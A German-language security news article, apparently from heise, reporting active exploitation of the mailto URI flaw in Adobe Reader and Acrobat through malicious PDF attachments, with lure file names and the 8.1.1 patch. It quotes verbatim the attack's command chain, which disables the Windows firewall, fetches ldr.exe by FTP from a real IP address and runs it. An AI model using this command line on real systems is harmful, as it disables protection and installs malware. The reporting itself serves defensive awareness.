Newsletter heise-Bot heise-Bot Push Nachrichten Push Push-Nachrichten

URI-Lücke in Adobes Produkten wird aktiv ausgenutzt [2.Update]

Manipulierte PDF-Dateien veranlassen Windows, die Firewall zu deaktivieren und eine Datei nachzuladen. Wahrscheinlich handelt es sich dabei um einen Trojaner.

In Pocket speichern vorlesen Druckansicht 234 Kommentare lesen
Lesezeit: 2 Min.
Security
Von
  • Daniel Bachfeld

Berichten auf der Sicherheitsmailingliste Full Disclosure zufolge gibt es bereits aktive Angriffe auf Anwender mittels präparierter PDF-Dokumente. Dabei enthalten die per E-Mail verschickten Dokumente eine URL, die versucht, über die bekannte URI-Lücke Befehle auf dem System auszuführen. Dabei soll es sich um folgende Befehlsfolge handeln:

 
mailto:%/../../../../../../Windows/system32/cmd".exe"" /c /q \"@echo
off&netsh firewall set opmode mode=disable&echo o 81.95.146.130>1&echo
binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1&
start ldr.exe&\" \"&\" "nul.bat"

Hier wird zunächst die Firewall unter Windows XP SP2 deaktiviert und per FTP die Datei ldr.exe nachgeladen und gestartet. Was dann im Weiteren geschieht, ist den Berichten nicht zu entnehmen. Es ist anzunehmen, dass sich ein Schädling auf dem System einnistet. Um Opfer eines Angriffs zu werden, ist es nicht zwingend erforderlich, einen Link im Dokument anzuklicken. Durch die Unterstützung von ActionScript, einer an JavaScript angelehnten Skriptsprache, kann das Dokument im Reader oder Acrobat die URL ohne Zutun des Anwenders aufrufen und somit die Befehlskette starten.

Die bösartigen PDF-Dateien sollen unter anderem Namen wie BILL.pdf, INVOICE.pdf und STATEMENT.pdf tragen, während als Betreffzeilen INVOICE alacrity, STATEMET indigene und INVOICE depredate gesichtet worden sind. Adobe stellt seit Anfang der Woche das Update 8.1.1 für den Adobe Reader und Acrobat zur Verfügung, in der das URI-Problem behoben ist. Anwender sollten so schnell wie möglich auf die aktuelle Version wechseln. Für diejenigen, denen aus bestimmten Gründen kein Update möglich ist, empfiehlt Adobe, in der Registry die Verknüpfung der mailto-URI mit Adobe-Produkten zu lösen. Ein Anleitung dazu findet sich hier: Update available for vulnerability in versions 8.1 and earlier of Adobe Reader and Acrobat

Update
Derzeit ist die Windows-Version des Adobe Reader 8.1.1 noch nicht in deutsch verfügbar. Interressanterweise ist bereits für Linux ein RPM-Paket der deutschen Version 8.1.1 herunterladbar – allerdings kommt dort das URI-Problem gar nicht zum Tragen.

2. Update
Die Mehrsprachen-Version des Updates für den Reader 8.1.1 ist hier erhältlich: Adobe Reader 8.1.1 update - multiple languages (dab)

Spiele

nach oben
Alle Angebote
Newsletter heise-Bot heise-Bot Push Nachrichten Push Push-Nachrichten